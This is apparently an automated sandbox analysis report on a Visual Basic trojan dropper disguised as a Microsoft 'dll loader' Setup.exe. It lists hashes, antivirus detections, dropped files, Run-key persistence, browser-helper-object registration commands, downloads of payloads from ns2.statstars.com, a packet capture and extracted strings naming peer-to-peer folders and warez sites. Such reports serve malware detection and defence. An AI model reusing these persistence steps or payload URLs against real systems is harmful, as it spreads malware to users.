Analysis Date2015-01-14 13:54:55
MD5a72a85524dfee36ab8da026e3dfef8a1
SHA1b29a0c325e56324720bc25f103b2fbd0458a58af

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 75bdabe41caff64aca79b8b169e2737f sha1: de3af1659315e6799b9f2f4c9d761f1e1ecb353e size: 126976
Section.data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section.rsrc md5: 298ed959aebeabd6f68b6746feebd55a sha1: 288a6ca919d17ee388633ac0629ef78542692fc9 size: 524288
Timestamp2010-01-20 21:38:37
Pdb path@
VersionLegalCopyright: microsoft compiler
InternalName: Setup
FileVersion: 1.02.0057
CompanyName: microsoft
Comments: microsoft
ProductName: microsoft dll loader
ProductVersion: 1.02.0057
FileDescription: dll loader
OriginalFilename: Setup.exe
PackerMicrosoft Visual Basic v5.0
PEhash01dd63e9eb635797114d8796c674c7f42c0a99f8
IMPhashf443df703e310dc5ad431cb600d66524
AV360 Safeno_virus
AVAd-AwareTrojan.Generic.6634916
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Trojan.Generic.6634916:Trojan.Generic.6140234:Trojan.Generic.8006684
AVAuthentiumW32/VB.AF.gen!Eldorado
AVAvira (antivir)TR/Dropper.Gen
AVBullGuardTrojan.Generic.6634916
AVCA (E-Trust Ino)Win32/Tnega.ACPU
AVCAT (quickheal)I-Worm.VB.jg.n3
AVClamAVTrojan.Agent-298260
AVDr. WebBackDoor.Siggen.32811
AVEmsisoftTrojan.Generic.6634916
AVEset (nod32)Win32/AutoRun.VB.VP worm
AVFortinetW32/Autorun.VB!tr
AVFrisk (f-prot)W32/VB.AF.gen!Eldorado
AVF-SecureTrojan.Generic.6634916
AVGrisoft (avg)Generic16.BFBN
AVIkarusTrojan.Win32.Mepaow
AVK7Backdoor ( 04c4da2a1 )
AVKasperskyTrojan-Dropper.Win32.Agent.ntyn
AVMalwareBytesTrojan.P2P.Downloader
AVMcafeeGeneric.dx!C0213B456727
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Tonick
AVMicroWorld (escan)Trojan.Generic.6634916
AVRisingTrojan.Win32.Generic.11E9E69C
AVSophosMal/VB-BZ
AVSymantecDownloader
AVTrend MicroPossible_Otorun8
AVVirusBlokAda (vba32)OScope.Trojan.VB.01381

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\VB and VBA Program Settings\tob\x\x ➝
x\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\xxxc.bat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\tmp-3\msdto.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\instal\key.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\zip.zip
Creates FileC:\WINDOWS\system32\vbzip11.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\instal\readm.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\tmp3.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\micka.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\instal\Install.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\instal\Install.exe
Creates Processregsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\tmp3.dll"
Creates Processregsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"
Creates Processregsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"
Creates Processregsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\micka.exe
Creates Processregsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"
Creates Processregsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"
Creates ProcessC:\Program Files\Ares\Ares.exe
Creates Processregsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"
Creates Processregsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"
Creates Processregsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"
Winsock URLhttp://ns2.statstars.com/zip.zip
Winsock URLhttp://ns2.statstars.com/main1.gif
Winsock URLhttp://google.com

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\tmp3.dll"

RegistryHKEY_CLASSES_ROOT\CLSID\{D5B72AED-E54A-11D6-B1B2-444553540000}\ ➝
BrowserHelper.CBrowserHelper\\x00
RegistryHKEY_CLASSES_ROOT\BrowserHelper.CBrowserHelper\ ➝
BrowserHelper.CBrowserHelper\\x00
RegistryHKEY_CLASSES_ROOT\Interface\{0557B73E-F61E-475E-A5C9-1E748F078467}\ ➝
CBrowserHelper\\x00

Process
↳ regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\WINDOWS\system32\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"

Process
↳ regsvr32.exe /s "C:\Documents and Settings\Administrator\Local Settings\Temp\vbzip11.dll"

Process
↳ C:\Program Files\Ares\Ares.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\micka.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs1.tmp
Creates FileC:\WINDOWS\TEMP\scs2.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\MICKA.EXE
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes FileC:\WINDOWS\TEMP\scs1.tmp
Deletes FileC:\WINDOWS\TEMP\scs2.tmp

Network Details:

DNSgoogle.com
Type: A
173.194.125.64
DNSgoogle.com
Type: A
173.194.125.78
DNSgoogle.com
Type: A
173.194.125.73
DNSgoogle.com
Type: A
173.194.125.72
DNSgoogle.com
Type: A
173.194.125.71
DNSgoogle.com
Type: A
173.194.125.70
DNSgoogle.com
Type: A
173.194.125.69
DNSgoogle.com
Type: A
173.194.125.68
DNSgoogle.com
Type: A
173.194.125.67
DNSgoogle.com
Type: A
173.194.125.66
DNSgoogle.com
Type: A
173.194.125.65
DNSns2.statstars.com
Type: A
184.168.221.96
HTTP GEThttp://google.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://ns2.statstars.com/zip.zip
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP GEThttp://ns2.statstars.com/main1.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1031 ➝ 173.194.125.64:80
Flows TCP192.168.1.1:1032 ➝ 184.168.221.96:80
Flows TCP192.168.1.1:1033 ➝ 184.168.221.96:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000040 (00064)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000050 (00080)   5631290d 0a486f73 743a2067 6f6f676c   V1)..Host: googl
0x00000060 (00096)   652e636f 6d0d0a0d 0a                  e.com....

0x00000000 (00000)   47455420 2f7a6970 2e7a6970 20485454   GET /zip.zip HTT
0x00000010 (00016)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000020 (00032)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000030 (00048)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000040 (00064)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000050 (00080)   20352e31 3b205356 31290d0a 486f7374    5.1; SV1)..Host
0x00000060 (00096)   3a206e73 322e7374 61747374 6172732e   : ns2.statstars.
0x00000070 (00112)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f6d6169 6e312e67 69662048   GET /main1.gif H
0x00000010 (00016)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000020 (00032)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000030 (00048)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000040 (00064)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000050 (00080)   4e542035 2e313b20 53563129 0d0a486f   NT 5.1; SV1)..Ho
0x00000060 (00096)   73743a20 6e73322e 73746174 73746172   st: ns2.statstar
0x00000070 (00112)   732e636f 6d0d0a0d 0a                  s.com....


Strings
..I
/.
\\
/
//
.//
/
UT
/
/
C.
.
e
 
00-+ 
\ -=::.:\a..
<KY[iii
/.
\\
/
//
.//
/
UT
/
/
C.
.
e
 
00-+ 
\ -=::.:\a.H.H
040904B0
040904E4
1.00.0013
1.02.0057
'12,%";
1s%P
2000
2003
21qeqe234-234eqe34-5qeqe5892-4sasw2
</a>
Abrir
Abrir USB
*\AC:\Documents and Settings\tonck\Desktop\BHO Sample\BrowserHelper.vbp
action
AddFileSpec
\AppData\Local\Ares\My Shared Folder\
\AppData\Local\Ares\My Shared Folder\incompletes\
\AppData\Local\eMule\config\preferences.ini
\AppData\Roaming\frostwire\frostwire.props
\AppData\Roaming\LimeWire\limewire.props
\Application Data\frostwire\frostwire.props
\Application Data\LimeWire\limewire.props
\Ares\Ares.exe
Ares.exe
asdasd
asdasd.exe
</a></th>
Autoconnect=0
Autoconnect=1
AUTORUN
\Autorun.inf
Autorun.inf
B*\AC:\Documents and Settings\tonck\Desktop\PP22PPlast\Project1.vbp
BasePath
base.zip
blank">
BrowserHelper
BrowserHelper.dll
bsJP2
class="BlckUnd">
ClearFileSpecs
Comments
CompanyName
CopyFileW
CURSOR
Del 
DIRECTORIES_TO_SEARCH_FOR_FILES
dll loader
\Documents\Shareaza Downloads\
\Documents\Shareaza Downloads\incompletes\
\Downloads\eMule\Incoming\
\emule\config\preferences.ini
\emule\emule.exe
emule.exe
\eMule\Incoming\
Error
.exe
FileDescription
FileVersion
final.exe,Shareaza.exe,emule.exe,Frostwire.exe,LimeWire.exe,Ares.exe,bla.exe
folderexists
FrostWire
Frostwire.exe
\frostwire\Frostwire.exe
         (((((                  H
Header
HKEY_
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_DYN_DATA
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D5B72AED-E54A-11D6-B1B2-444553540000}
HKEY_PERFORMANCE_DATA
HKEY_USERS
HOMEDRIVE
html
.html
http://apps.katz.cd/pg/--PAGE--
http://btjunkie.org/browse/Games/page
http://btjunkie.org/browse/Software/page
http://games.katz.cd/pg/1
http://games.katz.cd//pg/--PAGE--
http://google.com
http://ns2.statstars.com/main1.gif
http://ns2.statstars.com/test.gif
http://ns2.statstars.com/zip.zip
http://www.fullversions.org/crack-serial-keygen-torrent-free-full-download-App---PAGE--
http://www.fullversions.org/crack-serial-keygen-torrent-free-full-download-Game---PAGE--
http://www.newcracks.net/
http://www.phazeddl.com/pg/apps--PAGE--
http://www.phazeddl.com/pg/games--PAGE--
icon
_IID_CBROWSERHELPER
IIF]ZERZ[OEXR[\UCN@[SB@YK_GQt}mORMEPyqNFME\_qmZBCW]@cSEKPUU`oKQ
IIF]ZJHKHFTALMGY_WOGZPCOXH^@Pw|RNQLBQzpAGND[^rlEC@VZA`RJJSTRalJ.
IncomingDir
incomplete
incompletes\
Info-ZIP
Info-ZIP 1997
Info-ZIP's WiZ
Info-ZIP's Zip dll
inot.zip
\instal
\instal\
\instal\Install.exe
\instal\key.txt
\instal\readm.txt
InternalName
@isual Studio\VB98\C2
jjjj
jjjjjj
jjjjjjjjj
Js2P
kernel32
LegalCopyright
LimeWire
LimeWire.exe
\LimeWire\LimeWire.exe
\Local Settings\Application Data\Ares\My Shared Folder\
\Local Settings\Application Data\Ares\My Shared Folder\incompletes\
micka
\micka.exe
microsoft
microsoft compiler
microsoft dll loader
money money money,must be funny
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
msdto.exe
\My Documents\Shareaza Downloads\
\My Documents\Shareaza Downloads\incompletes\
(null)
OLESelfRegister
open
OriginalFilename
--PAGE--
--PAGE--/?o=52&t=0
--PAGE--/?o=72&t=0&s=1
ping; 1.2; 0.3; 0.4 - n; 1 - w; 500 > nul
please re-download the application
ProductName
ProductVersion
ProgramFiles
PROGRAMFILES
RecurseSubDirs
regsvr32.exe /s "
regwrite
Scripting.FileSystemObject
Setup
Setup.exe
Shareaza.exe
\Shareaza\Shareaza.exe
shell32
ShellExecuteW
shell\open
shell\open\command
shell\open\Default
ssPP
StoreFolderNames
StringFileInfo
system
%SystemRoot%\system32\SHELL32.dll,7
Temp
Text
The Device was not found!
\tmp-3\
\tmp3.dll
\tmp-3\msdto.exe
Translation
TYPELIB
Unknown
UONET SYSTEM
UseAutoPlay
USERPROFILE
VarFileInfo
\vbzip11.dll
Vista
VS_VERSION_INFO
\xxxc.bat
xxxc.bat
.zip
Zip32
ZIP32.DLL
ZipFile
\zip.zip
        
:;,=+"[]<>| 	
/////#
""""""
"""""""""
"""""""""""
"""""	"
0 0$0(0
0#000=0J0Q0`0
0"0*02080?0I0N0]0c0p0v0
0(0<0C0I0c0s0}0
0*0<0K0_0o0t0
0'0@0X0`0g0
000Z0c0i0
0/080L0a0g0y0
010>0E0P0W0b0o0u0{0
0&1+191`1e1s1
050[0u0|0
: :$:0:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
<!=0=:=a=o=x=
;"<0<?<F<Q<W<
= =,=0=H=P=X=`=h=p=|=
:0:>:Z:f:l:r:z:
1 1/1<1w1
1"1.141J1Z1m1s1
1$1/151:1@1M1j1p1{1
111~SSS
1,141m1|1
1"151;1A1z1
1$171>1P1X1h1
1$191C1V1_1
1<1D1h1p1
1$1I1c1o1
121E1M1Y1d1k1q1w1
1/252I2
142:2E2R2Z2b2j2r2y2~2
161?1w1~1
182C2R2W2\2e2o2
:):1:A:P:X:h:w:
1C1R1W1
>1?D?M?a?f?
?%?1?:?@?D?O?Z?m?t?
<#<+<1<?<F<M<Y<a<i<o<x<
>1>J>O>Y>^>y>Q?q?{?
1L2P2X2\2
;1;:;T;c;
20363O3U3]3m3
2 2$2(2,202z2
2 2$2(2,2<2D2L2T2X2\2`2d2h2l2p2t2x2|2
2 2'2-222E2Z2_2e2k2t2
2(22272?2J2P2V2[2y2
2 2&2,2A2r2
2)2.2<2r2w2
2#2D2I2S2Y2_2s2
2 2D2L2p2x2
2%2T2Y2
23292A2I2O2W2^2c2y2
2\3`3d3h3l3p3t3x3|3
2 3(3L3T3x3
2`3d3h3l3p3
283B3m3
?$?2?8?>?F?L?T?Z?f?k?t?y?
;!;2;C;I;U;[;f;
%2d%2d%4d
<2=>=d=i=s=
2G3W3u3
> >%>*>2>>>J>Y>a>f>q>v>
2K2X2e2l2q2
: :2:@:O:`:
2p2t2x2|2
3%323?3E3L3]3p3v3
3(3,3034383<3@3D3`3t3
3330XXX
3 3&3,32383>3D3J3P3V3\3b3h3n3t3z3
3#3=3C3T3m3y3
3-3>3e3k3
3-3?3P3Y3^3
3!3E3K3Q3X3]3
3&3J3U3]3
343X3g3m3
363L3g3
>%>->3>9>D>L>
3D4H4L4P4T4X4\4`4d4h4l4p4
3J3O3U3b3u3z3
3P4T4X4\4`4
:-:3:P:V:i:r:
? ?*?3?;?R?[?
<"<3<U<Z<d<~<
=#=3=>=X=^=
:,:3:Z:w:
40444X7\7`7x7|7
>4>#?-?2?W?e?
4%40454@4G4N4_4e4
4+40484>4C4q4w4}4
4(404T4\4
4"4(4.444:4@4F4L4R4X4^4d4j4p4v4|4
4 4$4@4T4\4`4d4~4
4%4/4G4L4V4p4~4
4!4&4n4
4*4?4T4u4
4*484m4
4%4M4h4n4
454;4A4H4M4q4w4}4
4+5?5F5`5k5r5x5
4=5X5g5
475E5J5W5l5u5
:(:4:8:@:T:X:\:`:d:h:l:p:t:|:
494L4U4k4
>4>a>h>u>
<(<,<4<A<L<Q<l<p<x<
:(:4:D:
%4d-%2d-%2d
;4<H<f<r<
4:mTW{THM,F
4P5X5`5h5p5x5
<#<4<P<_<q<z<
=4=P=Z=
;4<R<Z<z<
5 505m5t5
5.545:5C5X5m5w5
5%5+51585=5a5g5m5t5y5
5%5-535;5E5J5U5`5k5x5~5
5)5/5B5
5(5]5b5l5q5
5!5;5C5T5Y5f5k5
5#585>5N5c5i5r5x5
5+5Q5d5i5
5?5Y5n5
5#6.636]6
5(6/6w6
5>6a6r6
575B5I5R5Y5
585<5@5
585@5H5P5X5`5h5p5x5
585H5\5d5t5|5
>)?.?5?d?
5D9P9_9e9u9
5)eijY
:5;_;E<v<
6(626S6a6q6w6
6 6(60686@6H6P6X6`6h6p6x6
6#6-63696?6E6K6Q6W6]6c6g6m6s6y6
6"6;6}6
6&6+6<6X6i6
6#686j6t6
6=6E6w6
6"6F6L6R6Y6^6
6\6h6m6s6
6(70787=7D7Z7g7m7}7
6"747C7d7j7
6)7=7h7
6<7$8)8G8
6`7p7t7x7
6"7Z7#8
6L7S7Z7_7l7w7
*+6LVZ@
6T6]6h6t6z6
717F7O7Z7a7l7~7
747_7e7y7~7
7(757;7K7k7s7{7
@@@`777-
7 7(70787@7H7P7X7`7h7p7x7
777=7J7k7
7%7;7k8%9/:v:
7'7,7P7V7\7c7
7%7a7l7
7)7F7W7\7a7
7(848>8I8S8]8c8
798C8q8
7c7s7z7
=,=7=>=H=Q=W=
=%=,=7=j={=
7m8t8~8
<7=R=a=
819R9[9K:
829@9X9a9
839=9R9]9
84999@9F9T9Z9g9
858<8@8D8H8L8P8T8X8
868<8T8c8s8
8.848@8l8v8
8$8,848<8D8L8T8\8d8l8t8|8
8!8'8-868I8O8U8f8l8{8~9
8$888@8E8N8S8
8'8/8?8P8c8{8
8:8@8F8M8R8v8|8
8\8`8h8u8
8"8+8I8X8b8
8+8H8`8
8>9D9b9
;-;8;C;h;o;~;
8IeCBrowserHelperWW
?+?8?L?
8M9S9q9
>8>X>h>x>
93999E9j9u9
9,:4:9:L:Q:d:
^}%95 
9(909<9@9H9X9`9h9p9x9
9,919H9Y9_9h9n9
9&9+989D9Y9d9i9s9x9
9/9:9B9R9m9|9
9%9@9G9L9P9T9q9
99:M:[:z:
9::@:D:H:L:
9d:j:u:{:
>">9>G>Q>
;9;\;j;
9k:q:~:
;$<9<><T<`<l<q<{<
AAA_ggg
abnormal program termination
ABQ@RP
:Ac@wc@
AddFileSpec
  adding: %s
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
adjusting offsets for
AdjustTokenPrivileges
advapi32.dll
ADVAPI32.dll
alldatax
_allmul
allocating temp filename
AllowAppend
america
american
american english
american-english
:(=a=m=s=
>A?N?W?
Appending
Argentina
asdasd
A=Tj3TE
attempting to restore %s to its previous state
August
Australia
australian
Austria
>A?U?u?
B 02CV
bad extended local header for 
bad pack level
BasePath
Basque
>b'~b(
BBBp;;;>
bCancel
belgian
Belgium
:&;b;g;~;
:!:=:B:H:L:h:
=B=H=T=d=k=r=x=
==>B>[>i>
:#:B:J:c:l:
block vanished
>!>(>B>]>l>r>x>
=!=B=O=f=l=z=
britain
BrowserHelper
BrowserHelper.dll
bState
btHHt.
;$<*<C<
C =02CVu
c2.c3>c4Nc
CallWindowProcA
Canada
canadian
Cancel
cannot repeat names in zip file
can only have one -P
can only have one -t
can only have one -tt
can't rewrite method
can't use - and -@ together
can't use -d,-f,-u or -g on stdout
can't use -F with -A, -F ignored
can't use -T on stdout, -T ignored
can't use -y with -k, -y ignored
CBrowserHelper
_CBrowserHelperWd
:c:.;d;|;
C:\Documents and Settings\tonck\Desktop\asdasd.pdb
C:\Documents and Settings\tonck\Desktop\Setup.pdb
central 
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
ClearFileSpecs
CloseHandle
Colombia
Command1
Command2
Comment
CompareStringA
CompareStringW
 compressed size %ld, actual size %ld for %s
Compression
ConvertCRLFToLF
ConvertLFToCRLF
CopyFileA
Costa Rica
Could not create output file
could not open for reading: 
could not read input file: 
cP8!D*
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
CreateFileA
CreateMutexA
CreateRandomLetter
CreateToolhelp32Snapshot
CRLF-LF
>Cu28V
C:\WINDOWS\system32\ieframe.dll\1
C:\WINDOWS\system32\msvbvm60.dll\3
<=<d<	=
>'>d>}>
D$4j*P
da^ff^ebNf1
`.data
@.data
dC.dD>dENdF^dGndH~
dc{odadm
dddd, MMMM dd, yyyy
DDDI{{{
December
 (deflated %d%%)
Delete
DeleteCriticalSection
DeleteFileA
deleting directory %s (if empty)                
deleting: %s
:<;@;D;H;L;l;p;t;x;|;
?;?D?I?X?a?h?m?
DllCanUnloadNow
DllFunctionCall
DllGetClassObject
DllRegisterServer
DllUnregisterServer
DOMAIN error
Dominican Republic
do not specify both -r and -R
dOve_vfo
?,?<?D?T?d?l?t?x?|?
dutch-belgian
D$ VSj
;^<d<x<~<
:!:>:D:y:
Ea|9\L)8L=5
Ecuador
eeeeeeeee
eLevel
empty name without -j or -r
Encrpyt
Encrypt
england
English
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
Enter comment for %s:
EnterCriticalSection
Enter password: 
Entry too big to split
EnumSystemLocalesA
eR.eS>eTNeU
error deleting 
:!:&:,:<:E:S:]:b:
EVENT_SINK2_AddRef
EVENT_SINK2_Release
EVENT_SINK_AddRef
EVENT_SINK_GetIDsOfNames
EVENT_SINK_Invoke
EVENT_SINK_QueryInterface
EVENT_SINK_Release
excluding %s
ExitProcess
extended local header not found for 
fcaacopefm
 fcopy: write error
fCXwvoww
f;D$<t
February
ff&fc>Z
FFF#LLL
file and directory with the same name: 
file matches zip file -- skipping
File not found or no read permission
FileSpec
FileSpecCount
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindNextFileA
findos
FindWindowA
Finland
Finnish
  first full name: 
F@j@Ph
- floating point not loaded
FlushFileBuffers
FmoBrowser_BeforeNavigate2
FNNNN@
; ;/;>;F;N;T;\;a;j;p;v;
Force DOS
fOsbrRs
F PjPWj
F$PjQWj
F.PjRWj
F*PjTWj
F+PjUWj
F,PjVWj
F-PjWWj
\FqKZV2
France
FreeEnvironmentStringsA
FreeEnvironmentStringsW
French
french-belgian
french-canadian
french-luxembourg
french-swiss
Freshen
FreshenFiles
freshening: %s
Friday
fstat(stdin)
German
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetCurrentThreadId
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileInformationByHandle
GetFileTime
GetFileType
GetFullPathNameA
GetKernelObjectSecurity
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocaleInfoW
GetLocalTime
GetLogicalDriveStringsA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetParent
GetProcAddress
GetProcessHeap
GetSecurityDescriptorLength
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemDirectoryA
GetSystemTime
GetTimeZoneInformation
GetUserDefaultLCID
GetVersion
GetVersionExA
GetVolumeInformationA
GetWindow
GetWindowThreadProcessId
GIF89a
GlobalAlloc
GlobalFree
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalUnlock
?&?G?\?n?
>G>P>U>f>k>u>
great britain
Guatemala
`h````
H4Q4]4n4~4
has been
Headers
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HHtpHHtl
H:mm:ss
holland
hong-kong
hPs)uPsP
HSUVWh
< <:<I<
Iceland
Icelandic
ifexeruning
IFthere
#%iIMzR
IncludeSystemAndHiddenFiles
incorrect compressed size
InitializeCriticalSection
	(in=%lu) (out=%lu)
Input file read failure
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
Internal logic error
InternetCheckConnectionA
InternetCloseHandle
InternetOpenA
InternetOpenUrlA
InternetReadFile
Interrupted
Invalid command arguments
Invalid comment format
invalid date entered for -t option
invalid date entered for -tt option
invalid option(s) used with -d; ignored.
invalid path
invalid time
IObjectWithSite
IObjectWithSite_GetSite
IObjectWithSite_SetSite
irish-english
IsValidCodePage
IsValidLocale
italian-swiss
It[IItM
j0hTq@
}#j8h(G@
}#j8hhH@
JanFebMarAprMayJunJulAugSepOctNovDec
January
}#jdh0J@
}#jdhhK@
;J;e;u;{;
}#j\h0J@
}#j|hHG@
}#jhhHG@
jhhHG@
}#j\hhK@
jHhTq@
j$hTq@
JJJ2bjo
JJJ2HHHEEEEHHHHxHHH
JJJ2JJJ
}#jPhHG@
jPhHG@
jPhTq@
jPsEjPsZ]Os
}#jTh0N@
}#jTh\E@
Junk Dir Names
Junk SFX
} jXh\E@
}#jXhHG@
jXhTq@
;@<J<Z<
:$;<;K;];
Kernel32
KERNEL32.dll
killproces
 KKKby
KKK!FFF#R_g
KKK!HHHDEEEGEEEYHHH
KKK!HHHDEEEGGGGhHHH
k<PdAfv
<,<k<q<
kRspuRs
:Ksf9Ks{7Ks
L0N5Yd
l$0VWPU
L1T1X1\1d1h1t1|1
Label1
Label2
Label3
LC_ALL
LC_COLLATE
LC_CTYPE
LCMapStringA
LCMapStringW
LC_MONETARY
LC_NUMERIC
lCount
LC_TIME
 (%ld bytes security)
LeaveCriticalSection
LF-CRLF
LoadLibraryA
local 
local and central headers differ for 
local extra (%ld bytes) != central extra (%ld bytes): 
LocalFileTimeToFileTime
local flags = 0x%04x, central = 0x%04x: 
local header not found for 
LookupPrivilegeValueA
LosterMurdoc is r0x
=(=-=L=P=X=e=p=u=
:?;L;q;
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
>$>,><>L>T>d>t>|>
-l used on binary file
Luxembourg
;(;L;V;\;l;
;-;:;M;
made by version %d.%d on system type %d: 
mainrutine
Making argv
M/d/yy
MeCZha
MessageBoxA
MessageLevel
Mexico
microsoft
microsoft dll loader
Microsoft Visual C++ Runtime Library
missing argument for -b or -P
missing end signature--probably not a zip file (did you
missing or early
Missing or empty zip file
missing suffix list
***;mmm
MmuBrowser
moBrowser
Module1
Monday
MoveFileA
MSVBVM60.DLL
__MSVCRT_HEAP_SELECT
MultiByteToWideChar
multiple disk information ignored
name in zip file repeated: 
name lengths in local and central differ for 
name not matched: 
names in local and central differ for 
needs unzip %d.%d on system type %d: 
new-zealand
new zip file left as: 
nIndex
$}	nL	
NLPQhT
No Dir Entries
norwegian
norwegian-bokmal
norwegian-nynorsk
no such option: %c
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
 not found or empty
Nothing to do!
nothing to select from
November
November 29th 1999
nRs*aQs
nRs*aQs?|Ps
Ns1hRs
Ns1hRsf
NsbrRs
NsEjPs
Ns$FPs
Ns];Os
(null)
oC:\Documents and Settings\tonck\Desktop\BHO Sample\Vbshell.tlb
October
Offsets
 offset %u--local = %02x, central = %02x
:O:h:p:
OpenProcess
OpenProcessToken
Os0jPs
OsDROsk
OsEtPs
OsfLPs
Os mPs
?Os?|Ps*<Rs
?Os*<Rs
OssnPs0sRs
Os@sRs
OstLPs"
Os)uPs
Os"UPs
Out of memory
output buffer too small for in-memory compression
Output file write failure
>>>P,,,
Panama
Paraguay
PasswordRequest
password verification failed
pblnUpperCase
PeekNamedPipe
 PhTx@
Picture1
!!!pMMM
portuguese-brazilian
PostData
PPPPPPPP
ppvObj
